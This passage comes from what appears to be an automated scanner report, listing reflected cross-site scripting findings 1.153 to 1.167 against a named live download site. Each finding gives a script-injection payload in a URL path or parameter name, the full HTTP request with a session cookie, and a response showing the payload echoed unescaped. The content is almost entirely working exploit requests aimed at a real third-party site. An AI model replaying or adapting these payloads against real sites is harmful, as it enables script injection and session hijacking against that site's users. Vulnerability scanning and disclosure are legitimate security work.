This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1" />
...[SNIP]...

1.153. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6340"><script>alert(1)</script>56e52f2f479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html" />
...[SNIP]...

1.154. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36536"><script>alert(1)</script>62e91f4268d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d" />
...[SNIP]...

1.155. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 695c3"><script>alert(1)</script>3a42e06dc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1" />
...[SNIP]...

1.156. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4190"><script>alert(1)</script>b2c86d6f802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html" />
...[SNIP]...

1.157. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98438"><script>alert(1)</script>296e60cbefa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa" />
...[SNIP]...

1.158. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72117"><script>alert(1)</script>b715466a845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1" />
...[SNIP]...

1.159. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad71c"><script>alert(1)</script>a9e556abaea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html" />
...[SNIP]...

1.160. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae6b"><script>alert(1)</script>f87477f9823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823" />
...[SNIP]...

1.161. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f940"><script>alert(1)</script>3ed6d3e13d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1" />
...[SNIP]...

1.162. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c422"><script>alert(1)</script>5ca42390231 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html" />
...[SNIP]...

1.163. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e997"><script>alert(1)</script>a563157449d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d" />
...[SNIP]...

1.164. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6f5"><script>alert(1)</script>37142a6112a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1" />
...[SNIP]...

1.165. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ff"><script>alert(1)</script>aaabc5d7835 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html" />
...[SNIP]...

1.166. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25089"><script>alert(1)</script>5548c734076 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076" />
...[SNIP]...

1.167. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41d5"><script>alert(1)</script>6359a8cd029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77700

